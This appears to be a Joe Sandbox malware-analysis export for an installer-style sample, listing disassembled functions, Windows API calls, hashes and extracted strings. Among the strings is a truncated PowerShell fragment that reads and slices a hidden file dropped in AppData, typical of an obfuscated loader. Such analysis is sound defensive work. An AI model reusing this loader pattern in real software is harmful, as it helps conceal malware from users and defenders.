                                                            • Opcode ID: 10ef6d87f3fd7bea8bde0a3b6e3cee34a91868ef9ffca7f293b6e213662e1e0e
                                                            • Instruction ID: cb2347d6cbc19b0f628d54f49591885684dc807da670f32007c6c40ab910fdb0
                                                            • Opcode Fuzzy Hash: 10ef6d87f3fd7bea8bde0a3b6e3cee34a91868ef9ffca7f293b6e213662e1e0e
                                                            • Instruction Fuzzy Hash: A8F024339006008BD3016BA1AD02B977764FBC4306F09403AEE44762E1DBB658018B5D
                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(00000003,00402D3F,C:\Users\user\Desktop\YrCSUX2O3I.exe,80000000,00000003,?,?,?,00000000,004033FE,?), ref: 004059D3
                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,004033FE,?), ref: 004059F5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: File$AttributesCreate
                                                            • String ID:
                                                            • API String ID: 415043291-0
                                                            • Opcode ID: 37c4dc7839c603de99ed6860e60369df17b6bb7e4a2ae391e088aaa007eea51a
                                                            • Instruction ID: 1eb9dddf645dfc1e42ea27fadde30db719d7f554b9b2fef872a17e27e5e15d7e
                                                            • Opcode Fuzzy Hash: 37c4dc7839c603de99ed6860e60369df17b6bb7e4a2ae391e088aaa007eea51a
                                                            • Instruction Fuzzy Hash: C0D09E71654601EFEF098F20DE16F6EBBA2EB84B00F11952DB692940E0DA7158199B15
                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(?,?,00405599,?,?,00000000,00405785,?,?,?,?), ref: 004059AF
                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 004059C3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: 05994f7bb8a1ec96a0acbdf87cb19798dc47de50d2a954d4e2c693c8e603d6f5
                                                            • Instruction ID: 5089437a0038f9672fdec650e2f42df5ceafcb3a9c98f83db2fa6512ef2061e4
                                                            • Opcode Fuzzy Hash: 05994f7bb8a1ec96a0acbdf87cb19798dc47de50d2a954d4e2c693c8e603d6f5
                                                            • Instruction Fuzzy Hash: 09D012B2504520EFC2103728EF0C89BBF65DB543717028B35FDB5A22F0CB304C568A99
                                                            APIs
                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 00402288
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: PrivateProfileStringWrite
                                                            • String ID:
                                                            • API String ID: 390214022-0
                                                            • Opcode ID: 45cd240e89cb35acd2adb5c5489ef0982fec4b8f4934da7d4fbc5eb992d52d3a
                                                            • Instruction ID: 0b657d416b15e43c0193b3f865d343ab07691dd64d9d569c69532df3a91b5b61
                                                            • Opcode Fuzzy Hash: 45cd240e89cb35acd2adb5c5489ef0982fec4b8f4934da7d4fbc5eb992d52d3a
                                                            • Instruction Fuzzy Hash: 82E0BF32A045696ADB2036F20E8D97F30589B54754F15057FB513BA1C2DDFC0D815AAD
                                                            APIs
                                                            • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402F8B,000000FF,00000004,00000000,00000000,00000000), ref: 00403177
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: FileRead
                                                            APIs
                                                            • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402C02
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: Open
                                                            APIs
                                                            • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004022C4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: PrivateProfileString
                                                            APIs
                                                            • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            APIs
                                                            • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00403FF3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            APIs
                                                            • SendMessageW.USER32(00000028,?,00000001,00403DF6), ref: 00403FD8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            APIs
                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EC6,?,?,?,?,00000000,004033FE,?), ref: 004031A0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: FilePointer
                                                            APIs
                                                            • KiUserCallbackDispatcher.NTDLL(?,00403D8F), ref: 00403FC1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: CallbackDispatcherUser
                                                            APIs
                                                            • GetDlgItem.USER32(?,000003F9), ref: 0040498E
                                                            • GetDlgItem.USER32(?,00000408), ref: 00404999
                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 004049E3
                                                            • LoadBitmapW.USER32(0000006E), ref: 004049F6
                                                            • SetWindowLongW.USER32(?,000000FC,00404F6E), ref: 00404A0F
                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A23
                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404A35
                                                            • SendMessageW.USER32(?,00001109,00000002), ref: 00404A4B
                                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A57
                                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A69
                                                            • DeleteObject.GDI32(00000000), ref: 00404A6C
                                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404A97
                                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AA3
                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B39
                                                            • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404B64
                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B78
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00404BA7
                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BB5
                                                            • ShowWindow.USER32(?,00000005), ref: 00404BC6
                                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CC3
                                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
                                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
                                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
                                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D81
                                                            • ImageList_Destroy.COMCTL32(?), ref: 00404D96
                                                            • GlobalFree.KERNEL32(?), ref: 00404DA6
                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1F
                                                            • SendMessageW.USER32(?,00001102,?,?), ref: 00404EC8
                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED7
                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF7
                                                            • ShowWindow.USER32(?,00000000), ref: 00404F45
                                                            • GetDlgItem.USER32(?,000003FE), ref: 00404F50
                                                            • ShowWindow.USER32(00000000), ref: 00404F57
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                            • String ID: $M$N
                                                            • API String ID: 1638840714-813528018
                                                            • Opcode ID: 4bb4fbd11d964890b5e614a02caf67fc8325d7349ebfcc355399b97648a18b79
                                                            • Instruction ID: 6d1688c8488b8f7448caaf142d0c57913a8900a758ff6f7bd5d79a6fae369404
                                                            • Opcode Fuzzy Hash: 4bb4fbd11d964890b5e614a02caf67fc8325d7349ebfcc355399b97648a18b79
                                                            • Instruction Fuzzy Hash: 05026DB0900209EFEB149F54DD45AAE7BB9FB84314F14813AE610BA2E1C7B99D51CF58
                                                            APIs
                                                            • GetDlgItem.USER32(?,000003FB), ref: 0040447F
                                                            • SetWindowTextW.USER32(00000000,?), ref: 004044A9
                                                            • SHBrowseForFolderW.SHELL32(?), ref: 0040455A
                                                            • CoTaskMemFree.OLE32(00000000), ref: 00404565
                                                            • lstrcmpiW.KERNEL32(: Completed,0042D1F8,00000000,?,?), ref: 00404597
                                                            • lstrcatW.KERNEL32(?,: Completed), ref: 004045A3
                                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004045B5
                                                              • Part of subcall function 0040550D: GetDlgItemTextW.USER32(?,?,00000400,004045EC), ref: 00405520
                                                              • Part of subcall function 00405FDA: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\YrCSUX2O3I.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,76F93420,00403390), ref: 0040603D
                                                              • Part of subcall function 00405FDA: CharNextW.USER32(?,?,?,00000000), ref: 0040604C
                                                              • Part of subcall function 00405FDA: CharNextW.USER32(?,"C:\Users\user\Desktop\YrCSUX2O3I.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,76F93420,00403390), ref: 00406051
                                                              • Part of subcall function 00405FDA: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,76F93420,00403390), ref: 00406064
                                                            • GetDiskFreeSpaceW.KERNEL32(0042B1C8,?,?,0000040F,?,0042B1C8,0042B1C8,?,00000000,0042B1C8,?,?,000003FB,?), ref: 00404676
                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404691
                                                            • SetDlgItemTextW.USER32(00000000,00000400,0042B1B8), ref: 00404717
                                                            Strings
                                                            • A, xrefs: 00404553
                                                            • C:\Users\user\AppData\Roaming\Polysulfonate\sangersken, xrefs: 00404580
                                                            • "$Willock=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Hjtryks.Tog';$Fysiologen=$Willock.SubString(286, xrefs: 00404449
                                                            • QM, xrefs: 00404436
                                                            • : Completed, xrefs: 00404591, 00404596, 004045A1
                                                            Similarity
                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                            • String ID: "$Willock=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Hjtryks.Tog';$Fysiologen=$Willock.SubString(286$: Completed$A$C:\Users\user\AppData\Roaming\Polysulfonate\sangersken$QM
                                                            • API String ID: 2246997448-782904895
                                                            • Opcode ID: d261c670d50ba5bee67266af79b7bfed0b56d12dbf2e2e6faf1bb8e2e83b33c7
                                                            • Instruction ID: bd47b41a7abdf1344e554ed8777e7d92ff40a9b1da15b07d15b44e24a67a1b52
                                                            • Opcode Fuzzy Hash: d261c670d50ba5bee67266af79b7bfed0b56d12dbf2e2e6faf1bb8e2e83b33c7
                                                            • Instruction Fuzzy Hash: 4E9183B1900209ABDB11AFA1CD85AAF77B8EF85314F10843BF601B72D1D77C8A41CB69
                                                            APIs
                                                            • CoCreateInstance.OLE32(00408580,?,00000001,00408570,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020BD
                                                            Strings
                                                            • C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Skolevsens, xrefs: 004020F5
                                                            Similarity
                                                            • API ID: CreateInstance
                                                            • String ID: C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Skolevsens
                                                            • API String ID: 542301482-1921291325
                                                            • Opcode ID: 65ff1bb703aff5c65a52cd24046ec2ca8d8f77045bdbbb29ba0d81838cb63090
                                                            • Instruction ID: 088bd36a67d226d4641d4dbc6bd9d2ef39f197a4cbb9ab5218a9f08cb7fb8330
                                                            • Opcode Fuzzy Hash: 65ff1bb703aff5c65a52cd24046ec2ca8d8f77045bdbbb29ba0d81838cb63090
                                                            • Instruction Fuzzy Hash: 1C413075A00105AFCB00DFA4CD89EAE7BB6EF48314F20456AF906EB2D1DAB9DD41CB54
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402715
                                                            Similarity
                                                            • API ID: FileFindFirst
                                                            • String ID:
                                                            • API String ID: 1974802433-0
                                                            • Opcode ID: 569660b2523abb82da564ec188e45d2166ad8df796c24877e3114b12175852e5
                                                            • Instruction ID: 7be6c913c08d15ea884a43ce55a76abbcb29d6a56581a49c1298855279991998
                                                            • Opcode Fuzzy Hash: 569660b2523abb82da564ec188e45d2166ad8df796c24877e3114b12175852e5
                                                            • Instruction Fuzzy Hash: 19F05E75A001159BDB00EBA4DA499AEB378EF05324F60417BE516E31D1DBB44A41DB29
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d398b535e43ee880de6f9663a3da9d30c23bf20106ab7c53179b5f9c0eb57cb5
                                                            • Instruction ID: 531fec7b0fb0d211cf15be9fd3757e070872b4d27e2d3c8a48bb83720311cc85
                                                            • Opcode Fuzzy Hash: d398b535e43ee880de6f9663a3da9d30c23bf20106ab7c53179b5f9c0eb57cb5
                                                            • Instruction Fuzzy Hash: 01E19A71900705DFCB24CF98C890BAAB7F5FB44305F15882EE897A7291D778AAA1CF44
                                                            APIs
                                                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004041D0
                                                            • GetDlgItem.USER32(?,000003E8), ref: 004041E4
                                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404201
                                                            • GetSysColor.USER32(?), ref: 00404212
                                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404220
                                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040422E
                                                            • lstrlenW.KERNEL32(?), ref: 00404233
                                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404240
                                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404255
                                                            • GetDlgItem.USER32(?,0000040A), ref: 004042AE
                                                            • SendMessageW.USER32(00000000), ref: 004042B5
                                                            • GetDlgItem.USER32(?,000003E8), ref: 004042E0
                                                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404323
                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 00404331
                                                            • SetCursor.USER32(00000000), ref: 00404334
                                                            • ShellExecuteW.SHELL32(0000070B,open,@.C,00000000,00000000,00000001), ref: 00404349
                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00404355
                                                            • SetCursor.USER32(00000000), ref: 00404358
                                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404387
                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404399
                                                            Strings
                                                            Similarity
                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                            • String ID: @.C$N$open$QM
                                                            • API String ID: 3615053054-2153087072
                                                            • Opcode ID: 189af6bbec081a76bdebae2a70f4f566850949fa3ab236cd5487776f7d1f3ede
                                                            • Instruction ID: 99db4efdefbfae6e02fe30a975520441482abf578fd64f5d263331c8f1dab2c3
                                                            • Opcode Fuzzy Hash: 189af6bbec081a76bdebae2a70f4f566850949fa3ab236cd5487776f7d1f3ede
                                                            • Instruction Fuzzy Hash: 517181B1A00209FFDB119F60DD85AAA7B79FF84355F04803AFA05B61E0C778A951CF98
                                                            APIs
                                                            • lstrcpyW.KERNEL32(00430898,NUL,?,00000000,?,?,?,00405C08,?,?,00000001,0040579D,?,00000000,000000F1,?), ref: 00405A62
                                                            • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405C08,?,?,00000001,0040579D,?,00000000,000000F1,?), ref: 00405A86
                                                            • GetShortPathNameW.KERNEL32(00000000,00430898,00000400), ref: 00405A8F
                                                              • Part of subcall function 00405934: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00405B51,00000000,[Rename]), ref: 00405944
                                                              • Part of subcall function 00405934: lstrlenA.KERNEL32(?,?,00000000,00405B51,00000000,[Rename]), ref: 00405976
                                                            • GetShortPathNameW.KERNEL32(?,00431098,00000400), ref: 00405AAC
                                                            • wsprintfA.USER32 ref: 00405ACA
                                                            • GetFileSize.KERNEL32(00000000,00000000,00431098,C0000000,00000004,00431098,?,?,?,?,?), ref: 00405B05
                                                            • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405B14
                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405B2E
                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00405B5E
                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00430498,00000000,-0000000A,0040A514,00000000,[Rename]), ref: 00405BB4
                                                            • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00405BC6
                                                            • GlobalFree.KERNEL32(00000000), ref: 00405BCD
                                                            • CloseHandle.KERNEL32(00000000), ref: 00405BD4
                                                              • Part of subcall function 004059CF: GetFileAttributesW.KERNELBASE(00000003,00402D3F,C:\Users\user\Desktop\YrCSUX2O3I.exe,80000000,00000003,?,?,?,00000000,004033FE,?), ref: 004059D3
                                                              • Part of subcall function 004059CF: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,004033FE,?), ref: 004059F5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                            • String ID: %ls=%ls$NUL$[Rename]
                                                            • API String ID: 3756836283-899692902
                                                            • Opcode ID: f1fbf85e8721b65103666638b9a004b4b43e3e5a3ddcd2c3c3fa491cf2af1882
                                                            • Instruction ID: 2fe29930d4e79bd0ae977f5d9eb33e4478da98161fe3751d0f08acbad4e80cd6
                                                            • Opcode Fuzzy Hash: f1fbf85e8721b65103666638b9a004b4b43e3e5a3ddcd2c3c3fa491cf2af1882
